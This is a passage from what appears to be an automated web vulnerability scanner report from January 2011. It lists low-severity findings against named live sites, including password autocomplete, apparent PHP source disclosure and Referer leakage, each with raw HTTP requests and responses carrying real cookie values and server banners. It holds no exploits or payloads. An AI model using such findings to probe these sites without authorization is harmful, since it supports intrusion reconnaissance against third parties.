Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
   <l
...[SNIP]...
</DIV>

       <form method="post" action="/inc/form_scripts/advisor_login_script.php">
   
       <DIV ID="advisor_login_topleft_form_email">
...[SNIP]...
<DIV ID="advisor_login_topleft_form_password">Password:
<input name="password" id="password" type="password" value="" /></DIV>
...[SNIP]...

12.15. http://www.tukaiz.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tukaiz.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.php HTTP/1.1
Host: www.tukaiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.2.1
Set-Cookie: fc0fc83ec7006e5c547094008560a464=-; path=/
Date: Wed, 12 Jan 2011 05:01:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
</h3>
                   <form action="http://www.tukaiz.com/index.php" method="post" name="login" >
   
   <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
...[SNIP]...
<br />
           <input type="password" id="mod_login_password" name="passwd" class="inputbox" size="10" alt="password" />
           <br />
...[SNIP]...

13. Source code disclosure  previous  next
There are 5 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


13.1. http://www.addthis.com/bookmark.php  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:17:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<meta name="copyright" content="<?php echo AT_COPYRIGHT_TEXT ?>" />
...[SNIP]...

13.2. http://www.websitedescription.com/msn.whitepages.com  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.websitedescription.com
Path:   /msn.whitepages.com

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /msn.whitepages.com HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:26:52 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 29956

<?php include 'include.php'; ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...

13.3. http://www.wired.com/magazine/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /magazine/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /magazine/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/magazine/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 11:23:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:39:00 GMT
Date: Wed, 12 Jan 2011 15:39:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</li>


<?php wp_get_archives('type=postbypost&limit=10'); ?>
</ul>
<?php include (TEMPLATEPATH . "/most_recent_entries_supplement.php"); ?>
   </div>
...[SNIP]...

13.4. http://www.wired.com/magazine/ipad  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /magazine/ipad

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /magazine/ipad HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:28:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:04 GMT
Date: Wed, 12 Jan 2011 15:39:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</li>


<?php wp_get_archives('type=postbypost&limit=10'); ?>
</ul>
<?php include (TEMPLATEPATH . "/most_recent_entries_supplement.php"); ?>
   </div>
...[SNIP]...

13.5. http://www.wired.com/playbook/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /playbook/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /playbook/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:03:45 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=394
Expires: Wed, 12 Jan 2011 15:46:29 GMT
Date: Wed, 12 Jan 2011 15:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<img src="<?php bloginfo('template_directory'); ?>/images/envelope.gif" width="14" height="11" border="0" />
...[SNIP]...

14. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.crwdcntrl.net
Path:   /4/to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /4/to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454 HTTP/1.1
Host: ad.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=ctst; Domain=.crwdcntrl.net; Path=/
Location: http://ad.crwdcntrl.net/4/ct=y|ref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F|to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0

Request 2

GET /4/to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454 HTTP/1.1
Host: ad.crwdcntrl.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=ctst; Domain=.crwdcntrl.net; Path=/
Location: http://ad.crwdcntrl.net/4/ct=y|to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


15. Cross-domain Referer leakage  previous  next
There are 5 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


15.1. http://account.theregister.co.uk/register/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://account.theregister.co.uk
Path:   /register/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /register/?product=security_news HTTP/1.1
Host: account.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:12:29 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 27098

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<li>| <a href="http://www.reghardware.com/">Reg Hardware</a>
...[SNIP]...
<li>| <a href="http://www.channelregister.co.uk/">Channel Reg</a>
...[SNIP]...
<li><a href="http://www.channelregister.co.uk/">Channel Register</a>
...[SNIP]...
<li class=last><a href="http://www.reghardware.com/">Register Hardware</a>
...[SNIP]...

15.2. http://ad.uk.doubleclick.net/adj/reg.security.4159/front  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adj/reg.security.4159/front

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adj/reg.security.4159/front;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;ord=671761913? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Date: Wed, 12 Jan 2011 15:25:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 12375

var divid='dclkAdsDivID_19530';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_19530 = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\"><
...[SNIP]...
<!-- Begin Interstitial Ad -->');

$(function() {
//El Reg Welcome Ad - Reg, LOCAL FLASH script to IFRAME, Jan 2011.

var _REG_WA_displaytime = 18;

var h = 'http://s0.2mdn.net';

var _REG_WA = '<iframe src="http://regmedia.co.uk/2011/01/06/regwa-localflash.html?src='+h+'/1536772/isilon_640x480.swf&gif='+h+'/1536772/isilon_640x480_static.jpg&click=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3a8d/2/0/%2a/i%3B233459349%3B0-0%3B1%3B13500656%3B255-0/0%3B40103662/40121449/1%3B%3B%7Esscs%3D%3fhttp://info.isilon.com/forms/simpleissmart?source=uk_register_640x480_simpleissmart" width="640" height="480" frameborder="0"></iframe>
...[SNIP]...
<div id="REG_WAClose"><a href="http://www.theregister.co.uk/">Continue to The Register - Skip Ad<span>
...[SNIP]...

15.3. https://edit.yahoo.com/registration  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /registration

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /registration?.src=fpctx&.intl=us&.done=http://www.yahoo.com/ HTTP/1.1
Host: edit.yahoo.com
Connection: keep-alive
Referer: http://www.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=80eipqp6i4psl&b=3&s=j8

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 22:45:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 50154


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">    
 &n